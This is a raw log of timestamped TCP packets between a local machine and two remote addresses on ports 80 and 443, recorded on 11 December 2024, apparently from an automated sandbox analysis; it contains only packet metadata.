Dec 11, 2024 11:23:03.022711992 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.027216911 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.027282000 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.027323008 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.027370930 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.031599045 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.031703949 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.031786919 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.036164045 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.036245108 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.036314964 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.040674925 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.040733099 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.040797949 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.041028023 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.045233011 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.045281887 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.045336008 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.045411110 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.049746990 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.049807072 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.049895048 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.049943924 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.054672956 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.054733992 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.054775000 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.054817915 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.058860064 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.058970928 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.059019089 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.063414097 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.063462973 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.063637018 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.063688993 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.067961931 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.068034887 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.068104029 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.068146944 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.072565079 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.072662115 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.072710991 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.077050924 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.077141047 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.077188969 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.081660032 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.081732035 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.081773996 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.086174965 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.086224079 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.086275101 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.175764084 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.175817013 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.175858974 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.175880909 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.177875996 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.177922964 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.177992105 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.178037882 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.181468010 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.181520939 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.181608915 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.181660891 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.185257912 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.185302973 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.185353994 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.185400963 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.189095020 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.189143896 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.189214945 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.189276934 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.192893028 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.192945004 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.192996979 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.193042040 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.196685076 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.196732044 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.196782112 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.196827888 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.200536013 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.200587034 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.200642109 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.200699091 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.204356909 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.204406023 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.204438925 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.204484940 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.208203077 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.208250046 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.208273888 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.208319902 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.211986065 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.212034941 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.212089062 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.212135077 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.215863943 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.215895891 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.215912104 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.215938091 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.219594955 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.219647884 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.219719887 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.219763041 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.223548889 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.223654985 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.223735094 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.227229118 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.227299929 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.227354050 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.227395058 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.231046915 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.231103897 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.231168985 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.231211901 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.234297991 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.234349012 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.234425068 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.234469891 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.237493992 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.237548113 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.237620115 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.237663984 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.240777969 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.240901947 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.240957975 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.244025946 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.244076967 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.244118929 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.244160891 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.247349977 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.247523069 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.247565031 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.250478029 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.251332045 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:07.627820969 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:07.627944946 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:07.968465090 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:07.968523026 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:07.968648911 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:07.977830887 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:07.977849007 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:08.828927040 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:09.190644979 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.190722942 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.228571892 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.228598118 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.228857040 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.269124985 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.288486004 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.331342936 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.619034052 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.620254993 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.620311975 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.620326996 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.620452881 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.620477915 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.620491982 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.620500088 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.620567083 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.628273964 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.636815071 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.636889935 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.636897087 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.645112038 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.645189047 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.645195961 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.690984964 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.690992117 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.737859011 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.739527941 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.784754992 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.824714899 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.828856945 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.829067945 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.829123974 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.829138041 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.829180002 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.840363026 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.848721027 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.848839998 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.848896027 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.848902941 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.848942041 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.857240915 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.865603924 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.869225979 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.869231939 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.873970032 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.877227068 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.877233028 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.882255077 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.882384062 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.882390022 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.888290882 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.888338089 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.888341904 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.900140047 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.900188923 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.900196075 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.906126976 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.906152010 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.906173944 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:09.906182051 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:09.906223059 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.016681910 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.050219059 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.050230026 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.050250053 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.050256968 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.050280094 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.050306082 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.050323009 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.050342083 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.050389051 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.078265905 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.078274965 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.078304052 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.078318119 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.078339100 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.078350067 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.078380108 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.078392982 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.110825062 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.110845089 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.110909939 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.110919952 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.110965014 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.219053984 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.219072104 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.219192982 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.219202042 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.219249010 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.243695974 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.243711948 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.243901968 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.243910074 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.243957043 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.265979052 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.265995979 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.266243935 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.266251087 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.266299009 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.288003922 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.288017988 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.288189888 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.288196087 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.288244009 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.307090998 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.307106018 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.307168961 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.307174921 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.307214022 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.405265093 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.405296087 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.405354023 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.405365944 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.405400038 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.405421019 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.421502113 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.421515942 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.421570063 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.421576023 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.421612978 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.437024117 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.437040091 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.437114954 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.437124968 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.437160015 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.449244976 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.449259996 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.449340105 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.449347973 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.449388027 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.463001013 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.463020086 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.463115931 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.463138103 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.463184118 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.475625038 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.475639105 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.475699902 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.475708961 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.475753069 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.489079952 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.489095926 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.489161015 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.489166975 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.489207029 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.502715111 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.502728939 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.502783060 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.502790928 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.502827883 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.597703934 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.597737074 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.597760916 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.597770929 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.597786903 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.597809076 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.606554031 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.606570005 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.606621981 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.606630087 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.606663942 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.616023064 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.616041899 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.616080046 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.616085052 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.616108894 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.616122007 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.624991894 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.625024080 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.625072002 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.625080109 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.625113010 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.632859945 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.632874012 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.632920027 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.632925987 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.632946014 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.632965088 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.642436981 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.642452002 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.642504930 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.642512083 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.642551899 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.650070906 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.650084972 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.650135040 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.650141001 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.650175095 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.658848047 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.658864021 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.658935070 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.658941031 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.658977032 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.787703037 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.787723064 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.787806034 CET	49710	443	192.168.2.6	151.101.1.137
Dec 11, 2024 11:23:10.787822008 CET	443	49710	151.101.1.137	192.168.2.6
Dec 11, 2024 11:23:10.787863016 CET	49710	443	192.168.2.6	151.101.1.137
